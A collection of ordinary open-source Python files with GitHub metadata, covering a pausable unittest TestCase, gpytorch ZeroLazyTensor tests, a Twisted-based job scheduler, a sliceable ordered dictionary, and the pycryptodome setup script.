self._log_assertion_calling = True
return method(self, first, second, places, msg, delta)
except BaseException:
error = True
raise
finally:
if not error and not log_assertion_calling:
frame = inspect.currentframe().f_back
self.log_for_assertion(
method_name, frame.f_lineno,
os.path.basename(frame.f_code.co_filename), msg)
self._log_assertion_calling = log_assertion_calling
return wrapper
class TestCase(unittest.TestCase):
def run(self, result):
_tag_for_clear_unnecessary_locals = None
self.__result = result
self.__pause_forwarder = result.pause_forwarder
self.__logger = result.logger
self.assertion_log = result.assertion_log
self._log_assertion_calling = False
self.options = result._options
if self.options is not None and "msg_repr_max_length" in self.options:
self._msg_repr_max_length = self.options["msg_repr_max_length"]
else:
self._msg_repr_max_length = 100
super(TestCase, self).run(result)
assert _tag_for_clear_unnecessary_locals is None
def subTest(self, msg="subtest", **params):
return super(TestCase, self).subTest(msg, **params)
def pause(self, info=None):
self.__result.before_pause(info)
status = self._extra_status()
_clear_unnecessary_locals()
try:
self.__pause_forwarder.pause(info)
finally:
self._restore_extra_status(status)
self.__result.after_pause(info)
def call_pauser_callback(self, action, info=None):
return self.__pause_forwarder.exec_callback(action, info)
def _extra_status(self):
status = {}
status["cwd"] = os.path.abspath(os.getcwd())
return status
def _restore_extra_status(self, status):
try:
os.chdir(status["cwd"])
except BaseException:
self.logger.error("Cannot change directory to '%s'.",
status["cwd"])
@property
def logger(self):
return self.__logger
@staticmethod
def add_action(method_name, method):
setattr(TestCase, method_name, method)
def log_for_assertion(self, method_name, lineno, filename, message):
if self.assertion_log:
text = "success %s (L%d in '%s')" % (method_name, lineno, filename)
if message is not None:
text += ": %s" % message
self.logger.info(text)
def assertRaises(self, excClass, callableObj=None, *args, **kwargs):
frame = inspect.currentframe().f_back
lineno = frame.f_lineno
filename = frame.f_code.co_filename
if (not callable(callableObj)) and (not args) and (not kwargs):
@contextlib.contextmanager
def helper():
error = False
msg = callableObj
try:
with super(TestCase, self).assertRaises(excClass) as cm:
yield cm
except BaseException:
error = True
raise
finally:
if not error:
self.log_for_assertion("assertRaises", lineno,
os.path.basename(filename), msg)
return helper()
else:
error = False
try:
super(TestCase, self).assertRaises(excClass, callableObj,
*args, **kwargs)
except BaseException:
error = True
raise
finally:
if not error:
self.log_for_assertion("assertRaises", lineno,
os.path.basename(filename), None)
def assertRaisesRegexp(self,
excClass,
regexp,
callableObj=None,
*args,
**kwargs):
frame = inspect.currentframe().f_back
lineno = frame.f_lineno
filename = frame.f_code.co_filename
if (not callable(callableObj)) and (not args) and (not kwargs):
@contextlib.contextmanager
def helper():
error = False
msg = callableObj
try:
with super(TestCase,
self).assertRaisesRegexp(excClass,
regexp) as cm:
yield cm
except BaseException:
error = True
raise
finally:
if not error:
self.log_for_assertion("assertRaisesRegexp", lineno,
os.path.basename(filename), msg)
return helper()
else:
error = False
try:
super(TestCase,
self).assertRaisesRegexp(excClass, regexp, callableObj,
*args, **kwargs)
except BaseException:
error = True
raise
finally:
if not error:
self.log_for_assertion("assertRaisesRegexp", lineno,
os.path.basename(filename), None)
# 1 parameter
for name in ("assertTrue", "assertFalse", "assertIsNone", "assertIsNotNone"):
setattr(TestCase, name, log_assertion1(name))
# 2 parameters
for name in (
"assertEqual",
"assertNotEqual",
"assertIs",
"assertIsNot",
"assertIn",
"assertNotIn",
"assertIsInstance",
"assertNotIsInstance",
"assertGreater",
"assertGreaterEqual",
"assertLess",
"assertLessEqual",
("assertRegexpMatches", "assertRegex"),
("assertNotRegexpMatches", "assertNotRegex"),
("assertItemsEqual", None),
("assertDictContainsSubset", None),
"assertMultiLineEqual",
"assertSequenceEqual",
"assertListEqual",
"assertTupleEqual",
"assertSetEqual",
"assertDictEqual",
):
if isinstance(name, tuple):
if hasattr(unittest.TestCase, name[0]):
setattr(TestCase, name[0], log_assertion2(name[0]))
elif name[1] is not None:
setattr(TestCase, name[1], log_assertion2(name[1]))
else:
setattr(TestCase, name, log_assertion2(name))
# assertAlmostEqual(first, second, places=7, msg=None, delta=None)
# assertNotAlmostEqual(first, second, places=7, msg=None, delta=None)
for name in ("assertAlmostEqual", "assertNotAlmostEqual"):
setattr(TestCase, name, log_assertion_almost(name))
| {
"content_hash": "82cb58d1ce9788ca82c7558f5b0a072f",
"timestamp": "",
"source": "github",
"line_count": 391,
"max_line_length": 79,
"avg_line_length": 34.74168797953964,
"alnum_prop": 0.5256919905771495,
"repo_name": "masamitsu-murase/pausable_unittest",
"id": "7b867ad14eed814eb6d7961a48eb25d013c45568",
"size": "13609",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pausable_unittest/testcase.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2883"
},
{
"name": "Python",
"bytes": "62179"
},
{
"name": "Shell",
"bytes": "2079"
}
],
"symlink_target": ""
} |
import unittest
import torch
from gpytorch.lazy import ZeroLazyTensor
from gpytorch.test.utils import approx_equal
class TestZeroLazyTensor(unittest.TestCase):
def test_evaluate(self):
lv = ZeroLazyTensor(5, 4, 3)
actual = torch.zeros(5, 4, 3)
res = lv.evaluate()
self.assertLess(torch.norm(res - actual), 1e-4)
def test_getitem(self):
lv = ZeroLazyTensor(5, 4, 3)
res_one = lv[0].evaluate()
self.assertLess(torch.norm(res_one - torch.zeros(4, 3)), 1e-4)
res_two = lv[:, 1, :]
self.assertLess(torch.norm(res_two - torch.zeros(5, 3)), 1e-4)
res_three = lv[:, :, 2]
self.assertLess(torch.norm(res_three - torch.zeros(5, 4)), 1e-4)
def test_getitem_complex(self):
lv = ZeroLazyTensor(5, 4, 3)
res_one = lv[[0, 1]].evaluate()
self.assertLess(torch.norm(res_one - torch.zeros(2, 4, 3)), 1e-4)
res_two = lv[:, [0, 1], :].evaluate()
self.assertLess(torch.norm(res_two - torch.zeros(5, 2, 3)), 1e-4)
res_three = lv[:, :, [0, 2]].evaluate()
self.assertLess(torch.norm(res_three - torch.zeros(5, 4, 2)), 1e-4)
def test_getitem_ellipsis(self):
lv = ZeroLazyTensor(5, 4, 3)
res_one = lv[[0, 1]].evaluate()
self.assertLess(torch.norm(res_one - torch.zeros(2, 4, 3)), 1e-4)
res_two = lv[:, [0, 1], ...].evaluate()
self.assertLess(torch.norm(res_two - torch.zeros(5, 2, 3)), 1e-4)
res_three = lv[..., [0, 2]].evaluate()
self.assertLess(torch.norm(res_three - torch.zeros(5, 4, 2)), 1e-4)
def test_get_item_tensor_index(self):
# Tests the default LV.__getitem__ behavior
lazy_tensor = ZeroLazyTensor(5, 5)
evaluated = lazy_tensor.evaluate()
index = (torch.tensor([0, 0, 1, 2]), torch.tensor([0, 1, 0, 2]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 0, 1, 2]), slice(None, None, None))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
index = (slice(None, None, None), torch.tensor([0, 0, 1, 2]))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
index = (Ellipsis, slice(None, None, None), torch.tensor([0, 0, 1, 2]))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
index = (Ellipsis, torch.tensor([0, 0, 1, 2]))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
def test_get_item_tensor_index_on_batch(self):
# Tests the default LV.__getitem__ behavior
lazy_tensor = ZeroLazyTensor(3, 5, 5)
evaluated = lazy_tensor.evaluate()
index = (torch.tensor([0, 1, 1, 0]), torch.tensor([0, 1, 0, 2]), torch.tensor([1, 2, 0, 1]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 1, 1, 0]), torch.tensor([0, 1, 0, 2]), slice(None, None, None))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 1, 1]), slice(None, None, None), torch.tensor([0, 1, 2]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (slice(None, None, None), torch.tensor([0, 1, 1, 0]), torch.tensor([0, 1, 0, 2]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 0, 1, 1]), slice(None, None, None), slice(None, None, None))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
index = (slice(None, None, None), torch.tensor([0, 0, 1, 2]), torch.tensor([0, 0, 1, 1]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 1, 1, 0]), torch.tensor([0, 1, 0, 2]), slice(None, None, None))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 0, 1, 0]), slice(None, None, None), torch.tensor([0, 0, 1, 1]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (Ellipsis, torch.tensor([0, 1, 1, 0]))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
def test_add_diag(self):
diag = torch.tensor(1.5)
res = ZeroLazyTensor(5, 5).add_diag(diag).evaluate()
actual = torch.eye(5).mul(1.5)
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor([1.5])
res = ZeroLazyTensor(5, 5).add_diag(diag).evaluate()
actual = torch.eye(5).mul(1.5)
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor([1.5, 1.3, 1.2, 1.1, 2.0])
res = ZeroLazyTensor(5, 5).add_diag(diag).evaluate()
actual = diag.diag()
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor(1.5)
res = ZeroLazyTensor(2, 5, 5).add_diag(diag).evaluate()
actual = torch.eye(5).unsqueeze(0).repeat(2, 1, 1).mul(1.5)
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor([1.5])
res = ZeroLazyTensor(2, 5, 5).add_diag(diag).evaluate()
actual = torch.eye(5).unsqueeze(0).repeat(2, 1, 1).mul(1.5)
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor([1.5, 1.3, 1.2, 1.1, 2.0])
res = ZeroLazyTensor(2, 5, 5).add_diag(diag).evaluate()
actual = diag.diag().unsqueeze(0).repeat(2, 1, 1)
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor([[1.5, 1.3, 1.2, 1.1, 2.0], [0, 1, 2, 1, 1]])
res = ZeroLazyTensor(2, 5, 5).add_diag(diag).evaluate()
actual = torch.cat([diag[0].diag().unsqueeze(0), diag[1].diag().unsqueeze(0)])
self.assertTrue(approx_equal(res, actual))
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "4f4af1e53f8a376a13524aa44c17193d",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 100,
"avg_line_length": 47.37903225806452,
"alnum_prop": 0.5962553191489361,
"repo_name": "jrg365/gpytorch",
"id": "cba98bb733b30210dad987c21d86ba1458b2a104",
"size": "5899",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/lazy/test_zero_lazy_tensor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "6005"
},
{
"name": "C++",
"bytes": "242"
},
{
"name": "Python",
"bytes": "338860"
}
],
"symlink_target": ""
} |
"""Schedules."""
import time
import random
from heapq import heappush, heappop
from twisted.internet import task
from ..components import *
from ..metacomponents import *
import logging
from .base import MetaComponent
logger = logging.getLogger(__name__)
class Scheduler(MetaComponent):
heap = []
allow_clients = False
enqueueloop = None
redistribute = True
enqueuing = False
def __init__(self, server, config, server_mode, queue, **kwargs):
self.queue = queue
super(Scheduler, self).__init__(server, server_mode)
def start(self):
self.enqueueloop = task.LoopingCall(self.enqueue)
self.enqueueloop.start(1)
def shutdown(self):
if self.enqueueloop:
self.enqueueloop.stop()
def is_valid(self, item):
return True
def add(self, item, interval):
if interval == 0:
return
enqueue_time = int(time.time() + random.randint(0, interval))
heappush(self.heap, (enqueue_time, (item, interval)))
def enqueue(self):
# Enqueue jobs
now = int(time.time())
# Compare the heap min timestamp with now().
# If it's time for the item to be queued, pop it, update the
# timestamp and add it back to the heap for the next go round.
if not self.enqueuing:
self.enqueuing = True
i = 0
logger.debug(len(self.heap))
while self.heap and self.heap[0][0] < now:
if self.queue.queue_size > 100000 and self.redistribute:
enqueue_time, (item, interval) = heappop(self.heap)
distribution = random.randint(-1 * interval / 2, interval / 2)
heappush(self.heap, (now + interval + distribution, (item, interval)))
else:
enqueue_time, (item, interval) = heappop(self.heap) # x is (enqueue_time, (item, interval))
i += 1
if self.is_valid(item):
# support for complex types, just set 'bytes'
if hasattr(item, 'bytes'):
self.queue.publish(item.bytes)
else:
self.queue.publish(item)
heappush(self.heap, (now + interval, (item, interval)))
if hasattr(item, 'type'):
self.server.stats.increment('scheduler.job.%s' % (item.type.replace('/', '.')), 0.1)
if i:
logger.debug("Added %s items to the queue." % i)
self.enqueuing = False
| {
"content_hash": "ef4b5c5d6bea60b865ea3472bd3506f6",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 112,
"avg_line_length": 35.986301369863014,
"alnum_prop": 0.5496764370003807,
"repo_name": "hiidef/hiispider",
"id": "5fa73d560622e9d7b6ebaf178f74d05bf6b59edf",
"size": "2674",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hiispider/metacomponents/scheduler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "532169"
},
{
"name": "Shell",
"bytes": "787"
}
],
"symlink_target": ""
} |
import collections
class SliceableDict(collections.OrderedDict):
def __getitem__(self, key):
stop_offset = 0
if isinstance(key, tuple):
key, stop_offset = key
if isinstance(key, slice):
return self.values()[self.__calculate_slice(key, stop_offset)]
return super(SliceableDict, self).__getitem__(key)
def __calculate_slice(self, key, stop_offset=0):
start, stop, step = key.start, key.stop, key.step
if start:
start = next(
i for i, (k, v) in enumerate(self.items())
if k == start
)
if stop:
stop = next(
i for i, (k, v) in enumerate(self.items())
if k == stop
) + stop_offset
return slice(start, stop, step)
| {
"content_hash": "b69e6cadd28522c18565224b06fff21a",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 74,
"avg_line_length": 26.612903225806452,
"alnum_prop": 0.52,
"repo_name": "mivdnber/roetsjbaan",
"id": "813a8dd332912a95f0af250de0e2fda6d0e5a2bd",
"size": "825",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "roetsjbaan/datatypes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "11201"
}
],
"symlink_target": ""
} |
from __future__ import print_function
try:
from setuptools import Extension, Command, setup
except ImportError:
from distutils.core import Extension, Command, setup
from distutils.command.build_ext import build_ext
from distutils.command.build_py import build_py
import re
import os
import sys
import shutil
import struct
from compiler_opt import set_compiler_options
use_separate_namespace = os.path.isfile(".separate_namespace")
project_name = "pycryptodome"
package_root = "Crypto"
other_project = "pycryptodomex"
other_root = "Cryptodome"
if use_separate_namespace:
project_name, other_project = other_project, project_name
package_root, other_root = other_root, package_root
longdesc = """
PyCryptodome
============
PyCryptodome is a self-contained Python package of low-level
cryptographic primitives.
It supports Python 2.6 and 2.7, Python 3.4 and newer, and PyPy.
You can install it with::
pip install THIS_PROJECT
All modules are installed under the ``THIS_ROOT`` package.
Check the OTHER_PROJECT_ project for the equivalent library that
works under the ``OTHER_ROOT`` package.
PyCryptodome is a fork of PyCrypto. It brings several enhancements
with respect to the last official version of PyCrypto (2.6.1),
for instance:
* Authenticated encryption modes (GCM, CCM, EAX, SIV, OCB)
* Accelerated AES on Intel platforms via AES-NI
* First class support for PyPy
* Elliptic curves cryptography (NIST P-256, P-384 and P-521 curves only)
* Better and more compact API (`nonce` and `iv` attributes for ciphers,
automatic generation of random nonces and IVs, simplified CTR cipher mode,
and more)
* SHA-3 (including SHAKE XOFs) and BLAKE2 hash algorithms
* Salsa20 and ChaCha20 stream ciphers
* scrypt and HKDF
* Deterministic (EC)DSA
* Password-protected PKCS#8 key containers
* Shamir's Secret Sharing scheme
* Random numbers get sourced directly from the OS (and not from a CSPRNG in userspace)
* Simplified install process, including better support for Windows
* Cleaner RSA and DSA key generation (largely based on FIPS 186-4)
* Major clean ups and simplification of the code base
PyCryptodome is not a wrapper to a separate C library like *OpenSSL*.
To the largest possible extent, algorithms are implemented in pure Python.
Only the pieces that are extremely critical to performance (e.g. block ciphers)
are implemented as C extensions.
For more information, see the `homepage`_.
All the code can be downloaded from `GitHub`_.
.. _OTHER_PROJECT: https://pypi.python.org/pypi/OTHER_PROJECT
.. _`homepage`: http://www.pycryptodome.org
.. _GitHub: https://github.com/Legrandin/pycryptodome
""".replace("THIS_PROJECT", project_name).\
replace("THIS_ROOT", package_root).\
replace("OTHER_PROJECT", other_project).\
replace("OTHER_ROOT", other_root)
class PCTBuildExt (build_ext):
# Avoid linking Python's dynamic library
def get_libraries(self, ext):
return []
class PCTBuildPy(build_py):
def find_package_modules(self, package, package_dir, *args, **kwargs):
modules = build_py.find_package_modules(self, package, package_dir,
*args, **kwargs)
# Exclude certain modules
retval = []
for item in modules:
pkg, module = item[:2]
retval.append(item)
return retval
class TestCommand(Command):
"Run self-test"
# Long option name, short option name, description
user_options = [
('skip-slow-tests', None, 'Skip slow tests'),
('wycheproof-warnings', None, 'Show warnings from wycheproof tests'),
('module=', 'm', 'Test a single module (e.g. Cipher, PublicKey)'),
]
def initialize_options(self):
self.build_dir = None
self.skip_slow_tests = None
self.wycheproof_warnings = None
self.module = None
def finalize_options(self):
self.set_undefined_options('install', ('build_lib', 'build_dir'))
self.config = {'slow_tests': not self.skip_slow_tests,
'wycheproof_warnings': self.wycheproof_warnings}
def run(self):
# Run sub commands
for cmd_name in self.get_sub_commands():
self.run_command(cmd_name)
# Run SelfTest
old_path = sys.path[:]
self.announce("running self-tests on " + package_root)
try:
sys.path.insert(0, self.build_dir)
if use_separate_namespace:
from Cryptodome import SelfTest
from Cryptodome.Math import Numbers
else:
from Crypto import SelfTest
from Crypto.Math import Numbers
moduleObj = None
if self.module:
if self.module.count('.') == 0:
# Test a whole a sub-package
full_module = package_root + ".SelfTest." + self.module
module_name = self.module
else:
# Test only a module
# Assume only one dot is present
comps = self.module.split('.')
module_name = "test_" + comps[1]
full_module = package_root + ".SelfTest." + comps[0] + "." + module_name
# Import sub-package or module
moduleObj = __import__(full_module, globals(), locals(), module_name)
print(package_root + ".Math implementation:",
str(Numbers._implementation))
SelfTest.run(module=moduleObj, verbosity=self.verbose, stream=sys.stdout, config=self.config)
finally:
# Restore sys.path
sys.path[:] = old_path
# Run slower self-tests
self.announce("running extended self-tests")
sub_commands = [('build', None)]
def create_cryptodome_lib():
assert os.path.isdir("lib/Crypto")
try:
shutil.rmtree("lib/Cryptodome")
except OSError:
pass
for root_src, dirs, files in os.walk("lib/Crypto"):
root_dst, nr_repl = re.subn('Crypto', 'Cryptodome', root_src)
assert nr_repl == 1
for dir_name in dirs:
full_dir_name_dst = os.path.join(root_dst, dir_name)
if not os.path.exists(full_dir_name_dst):
os.makedirs(full_dir_name_dst)
for file_name in files:
full_file_name_src = os.path.join(root_src, file_name)
full_file_name_dst = os.path.join(root_dst, file_name)
print("Copying file %s to %s" % (full_file_name_src, full_file_name_dst))
shutil.copy2(full_file_name_src, full_file_name_dst)
if full_file_name_src.split(".")[-1] not in ("py", "pyi"):
if full_file_name_src != "py.typed":
continue
if sys.version_info[0] > 2:
extra_param = { "encoding": "utf-8" }
else:
extra_param = {}
with open(full_file_name_dst, "rt", **extra_param) as fd:
content = (fd.read().
replace("Crypto.", "Cryptodome.").
replace("Crypto ", "Cryptodome ").
replace("'Crypto'", "'Cryptodome'").
replace('"Crypto"', '"Cryptodome"'))
os.remove(full_file_name_dst)
with open(full_file_name_dst, "wt", **extra_param) as fd:
fd.write(content)
# Parameters for setup
packages = [
"Crypto",
"Crypto.Cipher",
"Crypto.Hash",
"Crypto.IO",
"Crypto.PublicKey",
"Crypto.Protocol",
"Crypto.Random",
"Crypto.Signature",
"Crypto.Util",
"Crypto.Math",
"Crypto.SelfTest",
"Crypto.SelfTest.Cipher",
"Crypto.SelfTest.Hash",
"Crypto.SelfTest.IO",
"Crypto.SelfTest.Protocol",
"Crypto.SelfTest.PublicKey",
"Crypto.SelfTest.Random",
"Crypto.SelfTest.Signature",
"Crypto.SelfTest.Util",
"Crypto.SelfTest.Math",
]
package_data = {
"Crypto" : [ "py.typed", "*.pyi" ],
"Crypto.Cipher" : [ "*.pyi" ],
"Crypto.Hash" : [ "*.pyi" ],
"Crypto.Math" : [ "*.pyi" ],
"Crypto.Protocol" : [ "*.pyi" ],
"Crypto.PublicKey" : [ "*.pyi" ],
"Crypto.Random" : [ "*.pyi" ],
"Crypto.Signature" : [ "*.pyi" ],
"Crypto.IO" : [ "*.pyi" ],
"Crypto.Util" : [ "*.pyi" ],
"Crypto.SelfTest.Cipher" : [
"test_vectors/AES/*.*",
"test_vectors/TDES/*.*",
"test_vectors/wycheproof/*.*",
],
"Crypto.SelfTest.Hash" : [
"test_vectors/SHA1/*.*",
"test_vectors/SHA2/*.*",
"test_vectors/SHA3/*.*",
"test_vectors/keccak/*.*",
"test_vectors/BLAKE2s/*.*",
"test_vectors/BLAKE2b/*.*",
"test_vectors/wycheproof/*.*",
],
"Crypto.SelfTest.Signature" : [
"test_vectors/DSA/*.*",
"test_vectors/ECDSA/*.*",
"test_vectors/PKCS1-v1.5/*.*",
"test_vectors/PKCS1-PSS/*.*",
"test_vectors/wycheproof/*.*",
],
"Crypto.SelfTest.PublicKey" : [
"test_vectors/ECC/*.*",
"test_vectors/RSA/*.*",
],
"Crypto.SelfTest.Protocol" : [
"test_vectors/wycheproof/*.*",
],
}
ext_modules = [
# Hash functions
Extension("Crypto.Hash._MD2",
include_dirs=['src/'],
sources=["src/MD2.c"]),
Extension("Crypto.Hash._MD4",
include_dirs=['src/'],
sources=["src/MD4.c"]),
Extension("Crypto.Hash._MD5",
include_dirs=['src/'],
sources=["src/MD5.c"]),
Extension("Crypto.Hash._SHA1",
include_dirs=['src/'],
sources=["src/SHA1.c"]),
Extension("Crypto.Hash._SHA256",
include_dirs=['src/'],
sources=["src/SHA256.c"]),
Extension("Crypto.Hash._SHA224",
include_dirs=['src/'],
sources=["src/SHA224.c"]),
Extension("Crypto.Hash._SHA384",
include_dirs=['src/'],
sources=["src/SHA384.c"]),
Extension("Crypto.Hash._SHA512",
include_dirs=['src/'],
sources=["src/SHA512.c"]),
Extension("Crypto.Hash._RIPEMD160",
include_dirs=['src/'],
sources=["src/RIPEMD160.c"]),
Extension("Crypto.Hash._keccak",
include_dirs=['src/'],
sources=["src/keccak.c"]),
Extension("Crypto.Hash._BLAKE2b",
include_dirs=['src/'],
sources=["src/blake2b.c"]),
Extension("Crypto.Hash._BLAKE2s",
include_dirs=['src/'],
sources=["src/blake2s.c"]),
Extension("Crypto.Hash._ghash_portable",
include_dirs=['src/'],
sources=['src/ghash_portable.c']),
Extension("Crypto.Hash._ghash_clmul",
include_dirs=['src/'],
sources=['src/ghash_clmul.c']),
# MACs
Extension("Crypto.Hash._poly1305",
include_dirs=['src/'],
sources=["src/poly1305.c"]),
# Block encryption algorithms
Extension("Crypto.Cipher._raw_aes",
include_dirs=['src/'],
sources=["src/AES.c"]),
Extension("Crypto.Cipher._raw_aesni",
include_dirs=['src/'],
sources=["src/AESNI.c"]),
Extension("Crypto.Cipher._raw_arc2",
include_dirs=['src/'],
sources=["src/ARC2.c"]),
Extension("Crypto.Cipher._raw_blowfish",
include_dirs=['src/'],
sources=["src/blowfish.c"]),
Extension("Crypto.Cipher._raw_eksblowfish",
include_dirs=['src/'],
define_macros=[('EKS',None),],
sources=["src/blowfish.c"]),
Extension("Crypto.Cipher._raw_cast",
include_dirs=['src/'],
sources=["src/CAST.c"]),
Extension("Crypto.Cipher._raw_des",
include_dirs=['src/', 'src/libtom/'],
sources=["src/DES.c"]),
Extension("Crypto.Cipher._raw_des3",
include_dirs=['src/', 'src/libtom/'],
sources=["src/DES3.c"]),
Extension("Crypto.Util._cpuid_c",
include_dirs=['src/'],
sources=['src/cpuid.c']),
# Chaining modes
Extension("Crypto.Cipher._raw_ecb",
include_dirs=['src/'],
sources=["src/raw_ecb.c"]),
Extension("Crypto.Cipher._raw_cbc",
include_dirs=['src/'],
sources=["src/raw_cbc.c"]),
Extension("Crypto.Cipher._raw_cfb",
include_dirs=['src/'],
sources=["src/raw_cfb.c"]),
Extension("Crypto.Cipher._raw_ofb",
include_dirs=['src/'],
sources=["src/raw_ofb.c"]),
Extension("Crypto.Cipher._raw_ctr",
include_dirs=['src/'],
sources=["src/raw_ctr.c"]),
Extension("Crypto.Cipher._raw_ocb",
sources=["src/raw_ocb.c"]),
# Stream ciphers
Extension("Crypto.Cipher._ARC4",
include_dirs=['src/'],
sources=["src/ARC4.c"]),
Extension("Crypto.Cipher._Salsa20",
include_dirs=['src/', 'src/libtom/'],
sources=["src/Salsa20.c"]),
Extension("Crypto.Cipher._chacha20",
include_dirs=['src/'],
sources=["src/chacha20.c"]),
# Others
Extension("Crypto.Protocol._scrypt",
include_dirs=['src/'],
sources=["src/scrypt.c"]),
# Utility modules
Extension("Crypto.Util._strxor",
include_dirs=['src/'],
sources=['src/strxor.c']),
# ECC
Extension("Crypto.PublicKey._ec_ws",
include_dirs=['src/'],
sources=['src/modexp_utils.c', 'src/siphash.c', 'src/ec_ws.c', 'src/mont.c'],
),
# Math
Extension("Crypto.Math._modexp",
include_dirs=['src/'],
sources=['src/modexp.c', 'src/siphash.c', 'src/modexp_utils.c', 'src/mont.c'],
),
]
if use_separate_namespace:
# Fix-up setup information
for i in range(len(packages)):
packages[i] = packages[i].replace("Crypto", "Cryptodome")
new_package_data = {}
for k, v in package_data.items():
new_package_data[k.replace("Crypto", "Cryptodome")] = v
package_data = new_package_data
for ext in ext_modules:
ext.name = ext.name.replace("Crypto", "Cryptodome")
# Recreate lib/Cryptodome from scratch, unless it is the only
# directory available
if os.path.isdir("lib/Crypto"):
create_cryptodome_lib()
# Add compiler specific options.
set_compiler_options(package_root, ext_modules)
# By doing this we need to change version information in a single file
with open(os.path.join("lib", package_root, "__init__.py")) as init_root:
for line in init_root:
if line.startswith("version_info"):
version_tuple = eval(line.split("=")[1])
version_string = ".".join([str(x) for x in version_tuple])
setup(
name=project_name,
version=version_string,
description="Cryptographic library for Python",
long_description=longdesc,
author="Helder Eijs",
author_email="[email protected]",
url="https://www.pycryptodome.org",
platforms='Posix; MacOS X; Windows',
zip_safe=False,
python_requires='>=2.6, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*',
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: BSD License',
'License :: OSI Approved :: Apache Software License',
'License :: Public Domain',
'Intended Audience :: Developers',
'Operating System :: Unix',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
'Topic :: Security :: Cryptography',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
license="BSD, Public Domain, Apache",
packages=packages,
package_dir={"": "lib"},
package_data=package_data,
cmdclass={
'build_ext': PCTBuildExt,
'build_py': PCTBuildPy,
'test': TestCommand,
},
ext_modules=ext_modules,
)
| {
"content_hash": "5c23e2292fce05af25399592f6bd020d",
"timestamp": "",
"source": "github",
"line_count": 484,
"max_line_length": 105,
"avg_line_length": 33.03719008264463,
"alnum_prop": 0.5867417135709818,
"repo_name": "kawamon/hue",
"id": "74ea6e114fc954609bd9bf0756fa59000309c2d5",
"size": "17015",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/pycryptodomex-3.9.7/setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "5786"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "Batchfile",
"bytes": "118907"
},
{
"name": "C",
"bytes": "3196521"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "308860"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "1050129"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "D",
"bytes": "324"
},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "10981"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "411907"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "7312"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "24999718"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "HiveQL",
"bytes": "43"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "JSONiq",
"bytes": "4"
},
{
"name": "Java",
"bytes": "471854"
},
{
"name": "JavaScript",
"bytes": "28075556"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "Jupyter Notebook",
